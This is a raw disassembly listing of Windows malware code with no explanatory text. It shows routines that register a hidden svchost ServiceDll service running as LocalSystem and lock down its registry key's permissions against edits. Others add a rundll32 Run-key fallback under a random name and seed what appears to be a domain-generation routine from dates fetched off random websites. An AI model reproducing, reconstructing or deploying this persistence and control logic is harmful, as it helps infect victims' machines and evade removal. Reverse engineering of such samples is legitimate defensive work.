retn
sub_9AE195 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AE3A4(HKEY hKey)
sub_9AE3A4 proc near ; CODE XREF: sub_9AE496+80�p
pSecurityDescriptor= byte ptr -48h
pIdentifierAuthority= _SID_IDENTIFIER_AUTHORITY ptr -34h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
pSid = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
hKey = dword ptr 8
push 38h
push offset stru_9A4670
call __SEH_prolog
xor ebx, ebx
mov [ebp+var_24], ebx
mov [ebp+var_20], ebx
mov [ebp+pSid], ebx
mov [ebp+ms_exc.disabled], ebx
mov [ebp+pIdentifierAuthority.Value], bl
mov [ebp+pIdentifierAuthority.Value+1], bl
mov [ebp+pIdentifierAuthority.Value+2], bl
mov [ebp+pIdentifierAuthority.Value+3], bl
mov [ebp+pIdentifierAuthority.Value+4], bl
mov [ebp+pIdentifierAuthority.Value+5], 5
lea eax, [ebp+pSid]
push eax ; pSid
push ebx ; nSubAuthority7
push ebx ; nSubAuthority6
push ebx ; nSubAuthority5
push ebx ; nSubAuthority4
push ebx ; nSubAuthority3
push ebx ; nSubAuthority2
push ebx ; nSubAuthority1
push 12h ; nSubAuthority0
push 1 ; nSubAuthorityCount
lea eax, [ebp+pIdentifierAuthority]
push eax ; pIdentifierAuthority
call AllocateAndInitializeSid
push [ebp+pSid] ; pSid
call GetLengthSid
mov esi, eax
add esi, 10h
mov [ebp+var_28], esi
push esi ; dwBytes
push 40h ; uFlags
call GlobalAlloc
mov edi, eax
mov [ebp+var_20], edi
cmp edi, ebx
jz short loc_9AE45E
push 2 ; dwAclRevision
push esi ; nAclLength
push edi ; pAcl
call InitializeAcl
push [ebp+pSid] ; pSid
push 20019h ; AccessMask
push 2 ; dwAceRevision
push edi ; pAcl
call AddAccessAllowedAce
push 1 ; dwRevision
lea eax, [ebp+pSecurityDescriptor]
push eax ; pSecurityDescriptor
call InitializeSecurityDescriptor
push ebx ; bDaclDefaulted
push edi ; pDacl
push 1 ; bDaclPresent
lea eax, [ebp+pSecurityDescriptor]
push eax ; pSecurityDescriptor
call SetSecurityDescriptorDacl
lea eax, [ebp+pSecurityDescriptor]
push eax ; pSecurityDescriptor
push 4 ; SecurityInformation
push [ebp+hKey] ; hKey
call RegSetKeySecurity
mov [ebp+var_2C], eax
xor ecx, ecx
cmp eax, ebx
setz cl
mov [ebp+var_24], ecx
loc_9AE45E: ; CODE XREF: sub_9AE3A4+67�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_9AE474
; ---------------------------------------------------------------------------
loc_9AE464: ; DATA XREF: .text:stru_9A4670�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AE468: ; DATA XREF: .text:stru_9A4670�o
mov esp, [ebp+ms_exc.old_esp]
or [ebp+ms_exc.disabled], 0FFFFFFFFh
xor ebx, ebx
mov edi, [ebp+var_20]
loc_9AE474: ; CODE XREF: sub_9AE3A4+BE�j
cmp edi, ebx
jz short loc_9AE47F
push edi ; hMem
call GlobalFree
loc_9AE47F: ; CODE XREF: sub_9AE3A4+D2�j
cmp [ebp+pSid], ebx
jz short loc_9AE48D
push [ebp+pSid] ; pSid
call FreeSid
loc_9AE48D: ; CODE XREF: sub_9AE3A4+DE�j
mov eax, [ebp+var_24]
call __SEH_epilog
retn
sub_9AE3A4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AE496(HKEY hKey)
sub_9AE496 proc near ; CODE XREF: sub_9AE496+49�p
; sub_9AE641+1E8�p
Name = word ptr -214h
phkResult = dword ptr -0Ch
cchName = dword ptr -8
dwIndex = dword ptr -4
hKey = dword ptr 8
push ebp
mov ebp, esp
sub esp, 214h
push esi
push edi
mov edi, RegEnumKeyExW
xor esi, esi
push esi
push esi
push esi
push esi
lea eax, [ebp+cchName]
push eax
lea eax, [ebp+Name]
push eax
mov [ebp+dwIndex], esi
push esi
jmp short loc_9AE503
; ---------------------------------------------------------------------------
loc_9AE4BE: ; CODE XREF: sub_9AE496+7B�j
lea eax, [ebp+phkResult]
push eax ; phkResult
push 0F003Fh ; samDesired
push esi ; ulOptions
lea eax, [ebp+Name]
push eax ; lpSubKey
push [ebp+hKey] ; hKey
call RegOpenKeyExW
test eax, eax
jnz short loc_9AE4EE
push [ebp+phkResult] ; hKey
call sub_9AE496
pop ecx
push [ebp+phkResult] ; hKey
call RegCloseKey
loc_9AE4EE: ; CODE XREF: sub_9AE496+44�j
inc [ebp+dwIndex]
push esi ; lpftLastWriteTime
push esi ; lpcchClass
push esi ; lpClass
push esi ; lpReserved
lea eax, [ebp+cchName]
push eax ; lpcchName
lea eax, [ebp+Name]
push eax ; lpName
push [ebp+dwIndex] ; dwIndex
loc_9AE503: ; CODE XREF: sub_9AE496+26�j
push [ebp+hKey] ; hKey
mov [ebp+cchName], 104h
call edi ; RegEnumKeyExW
test eax, eax
jz short loc_9AE4BE
push [ebp+hKey] ; hKey
call sub_9AE3A4
pop ecx
pop edi
pop esi
leave
retn
sub_9AE496 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AE520(wchar_t *Src,LPCWSTR lpValueName)
sub_9AE520 proc near ; CODE XREF: sub_9AE641+1D2�p
SubKey = word ptr -88h
Type = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
Data = byte ptr -9
hKey = dword ptr -8
cbData = dword ptr -4
Src = dword ptr 8
lpValueName = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 88h
push ebx
push esi
push edi
push 1Ah
pop ecx
mov esi, offset aSoftwareMicr_1 ; "SOFTWARE\\Microsoft\\Windows NT\\CurrentVe"...
lea edi, [ebp+SubKey]
rep movsd
lea eax, [ebp+hKey]
push eax ; phkResult
push 3 ; samDesired
xor ebx, ebx
push ebx ; ulOptions
lea eax, [ebp+SubKey]
push eax ; lpSubKey
push 80000002h ; hKey
mov [ebp+var_10], ebx
movsw
call RegOpenKeyExW
test eax, eax
jnz loc_9AE639
mov esi, RegQueryValueExW
lea eax, [ebp+cbData]
push eax ; lpcbData
lea eax, [ebp+Data]
push eax ; lpData
lea eax, [ebp+Type]
push eax ; lpType
push ebx ; lpReserved
push [ebp+lpValueName] ; lpValueName
mov [ebp+cbData], 1
push [ebp+hKey] ; hKey
mov [ebp+Type], 7
call esi ; RegQueryValueExW
cmp eax, 0EAh
jnz loc_9AE630
push [ebp+Src] ; Str
mov edi, wcslen
call edi ; wcslen
pop ecx
mov ecx, [ebp+cbData]
lea eax, [ecx+eax*2+2]
push eax ; dwBytes
push 40h ; uFlags
mov [ebp+var_18], eax
call GlobalAlloc
mov ebx, eax
test ebx, ebx
jz short loc_9AE630
lea eax, [ebp+cbData]
push eax ; lpcbData
push ebx ; lpData
lea eax, [ebp+var_14]
push eax ; lpType
push 0 ; lpReserved
push [ebp+lpValueName] ; lpValueName
mov [ebp+var_14], 7
push [ebp+hKey] ; hKey
call esi ; RegQueryValueExW
test eax, eax
jnz short loc_9AE629
mov esi, [ebp+cbData]
push [ebp+Src] ; Str
shr esi, 1
dec esi
call edi ; wcslen
lea edi, [eax+eax+2]
push edi ; Size
push [ebp+Src] ; Src
add esi, esi
lea eax, [esi+ebx]
push eax ; Dst
call memcpy
push 2 ; Size
add esi, edi
push 0 ; Val
add esi, ebx
push esi ; Dst
call memset
add esp, 1Ch
push [ebp+var_18] ; cbData
push ebx ; lpData
push 7 ; dwType
push 0 ; Reserved
push [ebp+lpValueName] ; lpValueName
push [ebp+hKey] ; hKey
call RegSetValueExW
test eax, eax
jnz short loc_9AE629
mov [ebp+var_10], 1
loc_9AE629: ; CODE XREF: sub_9AE520+B9�j
; sub_9AE520+100�j
push ebx ; hMem
call GlobalFree
loc_9AE630: ; CODE XREF: sub_9AE520+72�j
; sub_9AE520+9B�j
push [ebp+hKey] ; hKey
call RegCloseKey
loc_9AE639: ; CODE XREF: sub_9AE520+3E�j
mov eax, [ebp+var_10]
pop edi
pop esi
pop ebx
leave
retn
sub_9AE520 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AE641(int,wchar_t *Src,BYTE *lpData,wchar_t *lpValueName,int)
sub_9AE641 proc near ; CODE XREF: sub_9AE850+104�p
Source = word ptr -0ACh
var_60 = byte ptr -60h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
phkResult = dword ptr -10h
hMem = dword ptr -0Ch
Data = byte ptr -8
hKey = dword ptr -4
arg_0 = dword ptr 8
Src = dword ptr 0Ch
lpData = dword ptr 10h
lpValueName = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 0ACh
and [ebp+var_14], 0
push ebx
mov ebx, wcslen
push esi
push edi
push 13h
pop ecx
push [ebp+lpValueName] ; Str
mov esi, offset aSystemrootSyst ; "%SystemRoot%\\system32\\svchost.exe -k "
lea edi, [ebp+Source]
rep movsd
call ebx ; wcslen
pop ecx
lea eax, [eax+eax+4Ch]
push eax ; dwBytes
push 40h ; uFlags
call GlobalAlloc
mov esi, eax
test esi, esi
mov [ebp+hMem], esi
jz short loc_9AE6D3
lea eax, [ebp+Source]
push eax ; Source
push esi ; Dest
call wcscpy
push [ebp+lpValueName] ; Source
push esi ; Dest
call wcscat
push 11h
pop ecx
push [ebp+Src] ; Str
mov esi, offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Services\\"
lea edi, [ebp+var_60]
rep movsd
movsw
call ebx ; wcslen
add esp, 14h
lea eax, [eax+eax+46h]
push eax ; dwBytes
push 40h ; uFlags
call GlobalAlloc
mov esi, eax
xor edi, edi
cmp esi, edi
mov [ebp+var_18], esi
jnz short loc_9AE6DA
push [ebp+hMem] ; hMem
call GlobalFree
loc_9AE6D3: ; CODE XREF: sub_9AE641+40�j
xor eax, eax
jmp loc_9AE84B
; ---------------------------------------------------------------------------
loc_9AE6DA: ; CODE XREF: sub_9AE641+87�j
lea eax, [ebp+var_60]
push eax ; Source
push esi ; Dest
call wcscpy
push [ebp+Src] ; Source
push esi ; Dest
call wcscat
add esp, 10h
push edi ; lpdwDisposition
lea eax, [ebp+hKey]
push eax ; phkResult
push edi ; lpSecurityAttributes
push 0F003Fh ; samDesired
push edi ; dwOptions
push edi ; lpClass
push edi ; Reserved
push esi ; lpSubKey
push 80000002h ; hKey
call RegCreateKeyExW
test eax, eax
jnz loc_9AE838
push [ebp+lpData] ; Str
call ebx ; wcslen
mov esi, RegSetValueExW
pop ecx
lea eax, [eax+eax+2]
push eax ; cbData
push [ebp+lpData] ; lpData
push 1 ; dwType
push edi ; Reserved
push offset ValueName ; "DisplayName"
push [ebp+hKey] ; hKey
call esi ; RegSetValueExW
push 4 ; cbData
lea eax, [ebp+Data]
push eax ; lpData
push 4 ; dwType
push edi ; Reserved
push offset aType ; "Type"
push [ebp+hKey] ; hKey
mov dword ptr [ebp+Data], 20h
call esi ; RegSetValueExW
push 4 ; cbData
lea eax, [ebp+Data]
push eax ; lpData
push 4 ; dwType
push edi ; Reserved
push offset aStart ; "Start"
push [ebp+hKey] ; hKey
mov dword ptr [ebp+Data], 2
call esi ; RegSetValueExW
push 4 ; cbData
lea eax, [ebp+Data]
push eax ; lpData
push 4 ; dwType
push edi ; Reserved
push offset aErrorcontrol ; "ErrorControl"
push [ebp+hKey] ; hKey
mov dword ptr [ebp+Data], edi
call esi ; RegSetValueExW
push [ebp+hMem] ; Str
call ebx ; wcslen
pop ecx
lea eax, [eax+eax+2]
push eax ; cbData
push [ebp+hMem] ; lpData
push 2 ; dwType
push edi ; Reserved
push offset aImagepath ; "ImagePath"
push [ebp+hKey] ; hKey
call esi ; RegSetValueExW
push 18h ; cbData
push offset Data ; "LocalSystem"
push 1 ; dwType
push edi ; Reserved
push offset aObjectname ; "ObjectName"
push [ebp+hKey] ; hKey
call esi ; RegSetValueExW
push [ebp+arg_10] ; Str
call ebx ; wcslen
pop ecx
lea eax, [eax+eax+2]
push eax ; cbData
push [ebp+arg_10] ; lpData
push 1 ; dwType
push edi ; Reserved
push offset aDescription ; "Description"
push [ebp+hKey] ; hKey
call esi ; RegSetValueExW
push edi ; lpdwDisposition
lea eax, [ebp+phkResult]
push eax ; phkResult
push edi ; lpSecurityAttributes
push 20006h ; samDesired
push edi ; dwOptions
push edi ; lpClass
push edi ; Reserved
push offset SubKey ; "Parameters"
push [ebp+hKey] ; hKey
call RegCreateKeyExW
test eax, eax
jnz short loc_9AE81D
push [ebp+arg_0] ; Str
call ebx ; wcslen
pop ecx
lea eax, [eax+eax+2]
push eax ; cbData
push [ebp+arg_0] ; lpData
push 2 ; dwType
push edi ; Reserved
push offset aServicedll ; "ServiceDll"
push [ebp+phkResult] ; hKey
call esi ; RegSetValueExW
push [ebp+phkResult] ; hKey
call RegCloseKey
push [ebp+lpValueName] ; lpValueName
push [ebp+Src] ; Src
call sub_9AE520
pop ecx
pop ecx
mov [ebp+var_14], eax
loc_9AE81D: ; CODE XREF: sub_9AE641+1A6�j
push [ebp+hKey] ; hKey
call RegFlushKey
push [ebp+hKey] ; hKey
call sub_9AE496
pop ecx
push [ebp+hKey] ; hKey
call RegCloseKey
loc_9AE838: ; CODE XREF: sub_9AE641+CD�j
push [ebp+hMem] ; hMem
mov esi, GlobalFree
call esi ; GlobalFree
push [ebp+var_18] ; hMem
call esi ; GlobalFree
mov eax, [ebp+var_14]
loc_9AE84B: ; CODE XREF: sub_9AE641+94�j
pop edi
pop esi
pop ebx
leave
retn
sub_9AE641 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
; int __cdecl sub_9AE850(char *lpMultiByteStr)
sub_9AE850 proc near ; CODE XREF: sub_9A752A+10A�p
Data = byte ptr -220h
var_11D = byte ptr -11Dh
Src = word ptr -11Ch
Dest = word ptr -9Ch
ValueName = byte ptr -1Ch
var_10 = dword ptr -10h
hMem = dword ptr -0Ch
var_8 = dword ptr -8
phkResult = dword ptr -4
lpMultiByteStr = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 220h
push ebx
push edi
push [ebp+74h+lpMultiByteStr] ; Str
xor ebx, ebx
mov [ebp+74h+var_8], ebx
call strlen
mov edi, eax
pop ecx
lea eax, [edi+edi+2]
push eax ; dwBytes
push 40h ; uFlags
mov [ebp+74h+var_10], edi
call GlobalAlloc
cmp eax, ebx
mov [ebp+74h+hMem], eax
jnz short loc_9AE88B
xor eax, eax
jmp loc_9AEA40
; ---------------------------------------------------------------------------
loc_9AE88B: ; CODE XREF: sub_9AE850+32�j
push esi
call sub_9AE195
mov esi, rand
mov [ebp+74h+phkResult], eax
call esi ; rand
push 5
pop ecx
cdq
idiv ecx
lea eax, [ebp+74h+Src]
add edx, ecx
push edx
push eax
call sub_9AC672
pop ecx
pop ecx
call esi ; rand
push 10h
cdq
pop ecx
idiv ecx
test edx, edx
jz short loc_9AE912
call esi ; rand
push 15h
xor edx, edx
pop ecx
div ecx
mov edi, edx
loc_9AE8CA: ; CODE XREF: sub_9AE850+87�j
call esi ; rand
push 15h
xor edx, edx
pop ecx
div ecx
mov ebx, edx
cmp edi, ebx
jz short loc_9AE8CA
push off_9BAAC8[edi*4] ; Source
lea eax, [ebp+74h+Dest]
push eax ; Dest
call wcscpy
mov edi, wcscat
lea eax, [ebp+74h+Dest]
push offset asc_9A48B4 ; " "
push eax ; Dest
call edi ; wcscat
push off_9BAAC8[ebx*4] ; Source
lea eax, [ebp+74h+Dest]
push eax ; Dest
call edi ; wcscat
mov edi, [ebp+74h+var_10]
add esp, 18h
xor ebx, ebx
jmp short loc_9AE928
; ---------------------------------------------------------------------------
loc_9AE912: ; CODE XREF: sub_9AE850+6D�j
call esi ; rand
push 5
pop ecx
cdq
idiv ecx
lea eax, [ebp+74h+Dest]
add edx, ecx
push edx
push eax
call sub_9AC672
pop ecx
pop ecx
loc_9AE928: ; CODE XREF: sub_9AE850+C0�j
inc edi
push edi ; cchWideChar
push [ebp+74h+hMem] ; lpWideCharStr
push 0FFFFFFFFh ; cbMultiByte
push [ebp+74h+lpMultiByteStr] ; lpMultiByteStr
push ebx ; dwFlags
push ebx ; CodePage
call MultiByteToWideChar
test eax, eax
jz short loc_9AE95F
push [ebp+74h+phkResult] ; int
lea eax, [ebp+74h+Dest]
push offset aNetsvcs ; "netsvcs"
push eax ; lpData
lea eax, [ebp+74h+Src]
push eax ; Src
push [ebp+74h+hMem] ; int
call sub_9AE641
add esp, 14h
mov [ebp+74h+var_8], eax
loc_9AE95F: ; CODE XREF: sub_9AE850+EC�j
push [ebp+74h+phkResult] ; Memory
call free
pop ecx
push [ebp+74h+hMem] ; hMem
call GlobalFree
cmp [ebp+74h+var_8], ebx
jnz loc_9AEA37
mov eax, dword_9BAF74
xor eax, 0B30AA17Bh
push eax ; Seed
call srand
call esi ; rand
push 5
pop ecx
cdq
idiv ecx
lea eax, [ebp+74h+ValueName]
add edx, ecx
push edx
push eax
call sub_9AC642
call sub_9AC50B
push offset aMarnwkcw ; "marnwkcw"
push [ebp+74h+lpMultiByteStr]
lea eax, [ebp+74h+Data]
push offset aRundll32_exe_0 ; "rundll32.exe \"%s\",%s"
push 104h ; Count
push eax ; Dest
call _snprintf
xor edi, edi
add esp, 20h
mov [ebp+74h+var_11D], 0
mov esi, 80000002h
inc edi
loc_9AE9D6: ; CODE XREF: sub_9AE850+1E5�j
cmp esi, 80000001h
jl short loc_9AEA37
push ebx ; lpdwDisposition
lea eax, [ebp+74h+phkResult]
push eax ; phkResult
push ebx ; lpSecurityAttributes
push 20006h ; samDesired
push ebx ; dwOptions
push ebx ; lpClass
push ebx ; Reserved
push offset aSoftwareMicr_2 ; "Software\\Microsoft\\Windows\\CurrentVersi"...
push esi ; hKey
call RegCreateKeyExA
test eax, eax
jnz short loc_9AEA31
lea eax, [ebp+74h+Data]
push eax ; Str
call strlen
pop ecx
inc eax
push eax ; cbData
lea eax, [ebp+74h+Data]
push eax ; lpData
push edi ; dwType
push ebx ; Reserved
lea eax, [ebp+74h+ValueName]
push eax ; lpValueName
push [ebp+74h+phkResult] ; hKey
call RegSetValueExA
test eax, eax
jnz short loc_9AEA28
mov [ebp+74h+var_8], edi
loc_9AEA28: ; CODE XREF: sub_9AE850+1D3�j
push [ebp+74h+phkResult] ; hKey
call RegCloseKey
loc_9AEA31: ; CODE XREF: sub_9AE850+1AA�j
dec esi
cmp [ebp+74h+var_8], ebx
jz short loc_9AE9D6
loc_9AEA37: ; CODE XREF: sub_9AE850+125�j
; sub_9AE850+18C�j
call sub_9AE140
mov eax, [ebp+74h+var_8]
pop esi
loc_9AEA40: ; CODE XREF: sub_9AE850+36�j
pop edi
pop ebx
add ebp, 74h
leave
retn
sub_9AE850 endp
; =============== S U B R O U T I N E =======================================
sub_9AEA47 proc near ; CODE XREF: sub_9AEA8D+25�p
push ebx
xor ebx, ebx
test esi, esi
jz short loc_9AEA89
cmp eax, 200h
jbe short loc_9AEA89
push edi
lea edi, [eax-200h]
push edi ; int
push esi ; int
lea eax, [esi+eax-200h]
push eax ; int
push dword_9BAB20 ; int
push offset dword_9BAB28 ; Src
call sub_9AF464
add esp, 14h
test al, al
jz short loc_9AEA88
push edi ; nNumberOfBytesToWrite
push esi ; lpBuffer
call sub_9AD473
pop ecx
pop ecx
mov ebx, eax
loc_9AEA88: ; CODE XREF: sub_9AEA47+34�j
pop edi
loc_9AEA89: ; CODE XREF: sub_9AEA47+5�j
; sub_9AEA47+C�j
mov eax, ebx
pop ebx
retn
sub_9AEA47 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AEA8D(LPCSTR lpszUrl)
sub_9AEA8D proc near ; CODE XREF: sub_9AEE25+2E�p
var_4 = dword ptr -4
lpszUrl = dword ptr 8
push ebp
mov ebp, esp
push ecx
push esi
push edi
xor edi, edi
push edi ; int
lea eax, [ebp+var_4]
push eax ; int
push [ebp+lpszUrl] ; lpszUrl
call sub_9ACAC1
mov esi, eax
add esp, 0Ch
cmp esi, edi
jz short loc_9AEAC0
mov eax, [ebp+var_4]
cmp eax, edi
jz short loc_9AEAB9
call sub_9AEA47
mov edi, eax
loc_9AEAB9: ; CODE XREF: sub_9AEA8D+23�j
push esi ; hMem
call GlobalFree
loc_9AEAC0: ; CODE XREF: sub_9AEA8D+1C�j
mov eax, edi
pop edi
pop esi
leave
retn
sub_9AEA8D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AEAC6(LPCSTR lpszUrl,int,int)
sub_9AEAC6 proc near ; CODE XREF: sub_9AEBA1+1E�p
szAgent = byte ptr -414h
var_413 = byte ptr -413h
var_14 = dword ptr -14h
hInternet = dword ptr -10h
var_C = dword ptr -0Ch
cbSize = dword ptr -8
var_1 = byte ptr -1
lpszUrl = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 414h
push ebx
push edi
xor eax, eax
xor ebx, ebx
mov [ebp+szAgent], bl
mov ecx, 0FFh
lea edi, [ebp+var_413]
rep stosd
stosw
stosb
lea eax, [ebp+cbSize]
push eax ; cbSize
lea eax, [ebp+szAgent]
push eax ; pszUAOut
push ebx ; dwOption
mov [ebp+var_1], bl
mov [ebp+cbSize], 400h
call ObtainUserAgentString
push ebx ; dwFlags
push ebx ; lpszProxyBypass
push ebx ; lpszProxy
push ebx ; dwAccessType
lea eax, [ebp+szAgent]
push eax ; lpszAgent
call InternetOpenA
cmp eax, ebx
mov [ebp+hInternet], eax
jz short loc_9AEB9A
push ebx ; dwContext
push 84080300h ; dwFlags
push ebx ; dwHeadersLength
push ebx ; lpszHeaders
push [ebp+lpszUrl] ; lpszUrl
push eax ; hInternet
call InternetOpenUrlA
mov edi, eax
cmp edi, ebx
jz short loc_9AEB91
push esi
mov esi, HttpQueryInfoA
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+cbSize]
push eax
lea eax, [ebp+var_14]
push eax
push 20000013h
push edi
mov [ebp+var_C], ebx
mov [ebp+cbSize], 4
call esi ; HttpQueryInfoA
test eax, eax
jz short loc_9AEB89
cmp [ebp+var_14], 0C8h
jnz short loc_9AEB89
mov eax, [ebp+arg_8]
mov [ebp+cbSize], eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+cbSize]
push eax
push [ebp+arg_4]
mov [ebp+var_C], ebx
push 9
push edi
call esi ; HttpQueryInfoA
test eax, eax
jz short loc_9AEB89
mov [ebp+var_1], 1
loc_9AEB89: ; CODE XREF: sub_9AEAC6+97�j
; sub_9AEAC6+A0�j ...
push edi ; hInternet
call InternetCloseHandle
pop esi
loc_9AEB91: ; CODE XREF: sub_9AEAC6+6E�j
push [ebp+hInternet] ; hInternet
call InternetCloseHandle
loc_9AEB9A: ; CODE XREF: sub_9AEAC6+56�j
mov al, [ebp+var_1]
pop edi
pop ebx
leave
retn
sub_9AEAC6 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9AEBA1(LPCSTR lpszUrl,int,int,int)
sub_9AEBA1 proc near ; CODE XREF: sub_9AEC85+4D�p
var_408 = dword ptr -408h
var_404 = dword ptr -404h
Str = byte ptr -400h
lpszUrl = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
sub esp, 408h
push ebp
push 400h ; int
lea eax, [esp+410h+Str]
push eax ; int
push [esp+414h+lpszUrl] ; lpszUrl
xor ebp, ebp
mov [esp+418h+var_404], ebp
call sub_9AEAC6
add esp, 0Ch
test al, al
jz loc_9AEC79
push esi
mov esi, strtok
push edi
mov edi, offset Delim ; ", "
lea eax, [esp+414h+Str]
push edi ; Delim
push eax ; Str
call esi ; strtok
test eax, eax
pop ecx
pop ecx
jz loc_9AEC77
push edi ; Delim
push ebp ; Str
call esi ; strtok
cmp eax, ebp
pop ecx
pop ecx
jz short loc_9AEC77
push ebx
mov ebx, atoi
push eax ; Str
call ebx ; atoi
mov ecx, [esp+41Ch+arg_4]
push edi ; Delim
push ebp ; Str
mov [ecx], ax
call esi ; strtok
mov ebp, eax
add esp, 0Ch
test ebp, ebp
jz short loc_9AEC76
and [esp+418h+var_408], 0
loc_9AEC1E: ; CODE XREF: sub_9AEBA1+A1�j
mov eax, [esp+418h+var_408]
push 3 ; MaxCount
push ebp ; Str
push off_9BAD40[eax*4] ; Str1
call _strnicmp
add esp, 0Ch
test eax, eax
jz short loc_9AEC46
inc [esp+418h+var_408]
cmp [esp+418h+var_408], 0Ch
jb short loc_9AEC1E
jmp short loc_9AEC55
; ---------------------------------------------------------------------------
loc_9AEC46: ; CODE XREF: sub_9AEBA1+96�j
mov eax, [esp+418h+var_408]
mov ecx, [esp+418h+arg_8]
inc eax
mov [ecx], ax
loc_9AEC55: ; CODE XREF: sub_9AEBA1+A3�j
push edi ; Delim
push 0 ; Str
call esi ; strtok
test eax, eax
pop ecx
pop ecx
jz short loc_9AEC76
push eax ; Str
call ebx ; atoi
pop ecx
mov ecx, [esp+418h+arg_C]
mov [ecx], ax
mov [esp+418h+var_404], 1
loc_9AEC76: ; CODE XREF: sub_9AEBA1+76�j
; sub_9AEBA1+BD�j
pop ebx
loc_9AEC77: ; CODE XREF: sub_9AEBA1+47�j
; sub_9AEBA1+55�j
pop edi
pop esi
loc_9AEC79: ; CODE XREF: sub_9AEBA1+28�j
mov eax, [esp+40Ch+var_404]
pop ebp
add esp, 408h
retn
sub_9AEBA1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AEC85 proc near ; CODE XREF: sub_9AEECE+4E�p
szUrl = byte ptr -38h
var_19 = byte ptr -19h
Dst = word ptr -18h
var_16 = dword ptr -16h
var_12 = dword ptr -12h
var_E = word ptr -0Eh
var_C = word ptr -0Ch
var_A = word ptr -0Ah
FileTime = _FILETIME ptr -8
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push 10h ; Size
xor ebx, ebx
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call memset
call rand
push 6
pop ecx
xor edx, edx
div ecx
lea eax, [ebp+szUrl]
push off_9BAD28[edx*4]
push offset aHttpWww_S ; "http://www.%s"
push 20h ; Count
push eax ; Dest
call _snprintf
lea eax, [ebp+Dst]
push eax ; int
lea eax, [ebp+var_16]
push eax ; int
lea eax, [ebp+var_12]
push eax ; int
lea eax, [ebp+szUrl]
push eax ; lpszUrl
mov [ebp+var_19], bl
call sub_9AEBA1
add esp, 2Ch
test eax, eax
jz short loc_9AECF0
cmp word ptr [ebp+var_12], bx
jz short loc_9AECF0
cmp word ptr [ebp+var_16], bx
jz short loc_9AECF0
cmp [ebp+Dst], bx
jnz short loc_9AED0E
loc_9AECF0: ; CODE XREF: sub_9AEC85+57�j
; sub_9AEC85+5D�j ...
lea eax, [ebp+Dst]
push eax ; lpSystemTime
call GetSystemTime
mov word ptr [ebp+var_16+2], bx
mov word ptr [ebp+var_12+2], bx
mov [ebp+var_A], bx
mov [ebp+var_E], bx
mov [ebp+var_C], bx
loc_9AED0E: ; CODE XREF: sub_9AEC85+69�j
lea eax, [ebp+FileTime]
push eax ; lpFileTime
lea eax, [ebp+Dst]
push eax ; lpSystemTime
call SystemTimeToFileTime
push 3
push 52C94565h
push [ebp+FileTime.dwHighDateTime]
push [ebp+FileTime.dwLowDateTime]
call __allmul
push 580h
push 28E44000h
push edx
push eax
call __aulldiv
add eax, 0A3596526h
adc edx, ebx
mov dword ptr dbl_9BAD90, eax
mov dword ptr dbl_9BAD90+4, edx
pop ebx
leave
retn
sub_9AEC85 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AED54 proc near ; CODE XREF: sub_9AEECE+78�p
; sub_9AEECE+97�p ...
var_30 = qword ptr -30h
var_20 = qword ptr -20h
var_18 = qword ptr -18h
var_10 = qword ptr -10h
var_8 = qword ptr -8
push ebp
mov ebp, esp
sub esp, 20h
mov ecx, dword ptr dbl_9BAD90+4
mov eax, dword ptr dbl_9BAD90
and dword ptr [ebp+var_8], 0
push esi
mov edx, ecx
push edi
mov dword ptr [ebp+var_8+4], edx
mov edi, 7FFFFFFFh
and edx, edi
mov dword ptr [ebp+var_10], eax
mov dword ptr [ebp+var_10+4], edx
fild [ebp+var_10]
mov esi, 80000000h
and dword ptr [ebp+var_8+4], esi
fild [ebp+var_8]
and dword ptr [ebp+var_8], 0
mov dword ptr [ebp+var_8+4], ecx
and dword ptr [ebp+var_8+4], esi
fchs
and ecx, edi
faddp st(1), st
mov dword ptr [ebp+var_18], eax
mov dword ptr [ebp+var_18+4], ecx
push ecx
fstp [ebp+var_10]
push ecx
fild [ebp+var_18]
fild [ebp+var_8]
fchs
faddp st(1), st
fstp [esp+30h+var_30]
call sin
add esp, 8
fstp [ebp+var_20]
push 0
push 53125624h
push dword ptr dbl_9BAD90+4
push dword ptr dbl_9BAD90
call __allmul
and dword ptr [ebp+var_8], 0
mov dword ptr [ebp+var_8+4], edx
and dword ptr [ebp+var_8+4], esi
and edx, edi
mov dword ptr [ebp+var_18], eax
mov dword ptr [ebp+var_18+4], edx
fild [ebp+var_18]
push ecx
fild [ebp+var_8]
push ecx
fchs
faddp st(1), st
fadd [ebp+var_20]
fmul [ebp+var_10]
fadd dbl_9A4958
fmul [ebp+var_10]
fstp [ebp+var_20]
fld [ebp+var_10]
fstp [esp+30h+var_30]
call log
fadd [ebp+var_20]
pop ecx
pop ecx
pop edi
fstp dbl_9BAD90
mov eax, dword ptr dbl_9BAD90
pop esi
leave
retn
sub_9AED54 endp
; =============== S U B R O U T I N E =======================================
